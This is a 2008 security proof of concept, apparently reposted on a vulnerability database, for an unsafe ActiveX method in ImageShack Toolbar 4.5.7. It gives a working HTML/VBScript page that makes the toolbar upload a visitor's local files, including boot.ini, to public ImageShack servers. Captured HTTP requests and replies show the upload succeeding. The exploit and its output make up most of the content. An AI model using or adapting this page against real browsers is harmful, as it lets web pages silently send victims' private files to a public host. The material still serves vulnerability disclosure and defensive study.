Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

imageshack-poc.txt

🗓️ 25 Jan 2008 00:00:00Reported by rgodType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

ImageShack Toolbar 4.5.7 FileUploader Class security poc for arbitrary file uploa

Code
`<!--  
ImageShack Toolbar 4.5.7 FileUploader Class (ImageShackToolbar.dll) insecure  
method poc  
  
This tool may allow a malicious web page to post arbitrary images on the web  
from a user hard drive. Images will be visible on ImageShack site, a way for an  
attacker to retrieve them maybe tag search or by understanding the renaming  
operation, ex. "_" chars are removed and the "tq2" string is appended.  
My test image is still visible here:  
http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg  
Note that a file with a non-image extension can cross the network, Imageshack  
server replies with an error message, however this needs further investigation  
that I let you to do, ex. with custom packet fields injection.  
  
I suggest users to uninstall it temporarily an just use the site functionalities  
  
Object safety report:  
  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: True  
IDisp Safe: Safe for untrusted: caller  
  
rgod-tsid-pa-he-ru-ka  
-  
stay tuned with us ...  
http://retrogod.altervista.org/join.html  
security feeds, radio streams, techno/drum & bass stations to come  
-->  
  
<html>  
<body>  
<object classid='clsid:BDF9442E-9B03-42C2-87BA-2A459B0A5317' id='suntzu' /></object>  
<script language='vbscript'>  
suntzu.BuildSlideShow "file:///c:\\xp_wallpaper_glass.jpg","Big",1,"uhuhinterestingprivatethings","Fade","White"  
suntzu.BuildSlideShow "file:///c:\\boot.ini", "Big",1,"uhuhinterestingprivatethings","Fade","White"  
</script>  
</body>  
</html>  
  
----  
  
some wireshark's dump samples:  
  
POST /upload_api.php HTTP/1.1  
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141  
Content-Length: 21755  
User-Agent: ImageShack Toolbar 4.5.7 ([..])  
Host: load9.imageshack.us  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1  
  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="toolbar"  
  
IEImageShackToolbar-4.5.7.69  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="public"  
  
yes  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="xml"  
  
newformat  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="tags"  
  
uhuhinterestingprivatethings  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="rembar"  
  
1  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="fileupload"; filename="xp_wallpaper_glass.jpg"  
Content-Type: image/jpeg  
Content-Transfer-Encoding: binary  
  
[file content]  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="thumbupload"; filename="xp_wallpaper_glass6fa1f1.jpg"  
Content-Type: image/jpeg  
Content-Transfer-Encoding: binary  
  
[file content]  
--B-O-U-N-D-A-R-Y731553141  
Content-Disposition: form-data; name="class"  
  
s  
--B-O-U-N-D-A-R-Y731553141--  
  
  
reply:  
  
HTTP/1.1 200 OK  
Connection: close  
Transfer-Encoding: chunked  
X-Powered-By: PHP/5.1.2  
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us  
Set-Cookie: PHPSESSID=[..]; path=/  
Set-Cookie: always_opt=-1; path=/; domain=.imageshack.us  
Set-Cookie: rem_bar=1; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Content-type: text/xml  
Pragma: public  
Cache-Control: must-revalidate, post-check=0, pre-check=0  
Date: Thu, 24 Jan 2008 07:56:25 GMT  
Server: lighttpd/1.4.8  
  
<?xml version="1.0" encoding="iso-8859-1"?><imginfo xmlns="http//ns.imageshack.us/imginfo/6/" version="6" timestamp="1201161385">  
<rating>  
<ratings>0</ratings>  
<avg>0.0</avg>  
</rating>  
<files server="262" bucket="7959">  
<image size="16646" content-type="image/jpeg">xpwallpaperglasstq2.jpg</image>  
<thumb size="3155" content-type="image/jpeg">xpwallpaperglasstq2.th.jpg</thumb>  
</files>  
<resolution>  
<width>426</width>  
<height>320</height>  
</resolution>  
<class>s</class>  
<uploader>  
<ip>87.11.97.155</ip>  
</uploader>  
<links>  
<image_link>http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg</image_link>  
<image_html><a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a></image_html>  
<image_bb>[URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg[/IMG][/URL]</image_bb>  
<image_bb2>[url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg][/url]</image_bb2>  
<thumb_link>http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg</thumb_link>  
<thumb_html><a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a></thumb_html>  
<thumb_bb>[URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg[/IMG][/URL]</thumb_bb>  
<thumb_bb2>[url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg][/url]</thumb_bb2>  
<ad_link>http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg</ad_link>  
<done_page>http://img262.imageshack.us/content.php?page=done&l=img262/7959/xpwallpaperglasstq2.jpg</done_page>  
</links>  
</imginfo>  
  
with the boot.ini file:  
  
POST /upload_api.php HTTP/1.1  
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y732118720442  
Content-Length: 1077  
User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2)  
Host: load10.imageshack.us  
Connection: Keep-Alive  
Cache-Control: no-cache  
Cookie: imgshck=[..]; un_cookie=1; latest=img214; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1; always_opt=-1  
  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="toolbar"  
  
IEImageShackToolbar-4.5.7.69  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="public"  
  
yes  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="xml"  
  
newformat  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="tags"  
  
uhuhinterestingprivatethings  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="rembar"  
  
1  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="fileupload"; filename="boot.ini"  
Content-Type: application/octet-stream  
Content-Transfer-Encoding: binary  
  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" / fastdetect /NoExecute=OptIn  
--B-O-U-N-D-A-R-Y732118720442  
Content-Disposition: form-data; name="class"  
  
s  
--B-O-U-N-D-A-R-Y732118720442--  
  
reply:  
  
HTTP/1.1 200 OK  
Transfer-Encoding: chunked  
X-Powered-By: PHP/5.1.2  
Content-Type: text/xml  
Set-Cookie: latest=img89; expires=Sun, 18-Jan-2009 07:56:28 GMT; path=/; domain=.imageshack.us  
Date: Thu, 24 Jan 2008 07:56:28 GMT  
Server: lighttpd/1.4.18  
  
<links>  
<error id="wrong_file_type">Wrong file type detected for file boot.ini:application/octet-stream</error>  
</links>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4
arbitrary file uploadimageshack toolbarsecurity poc
36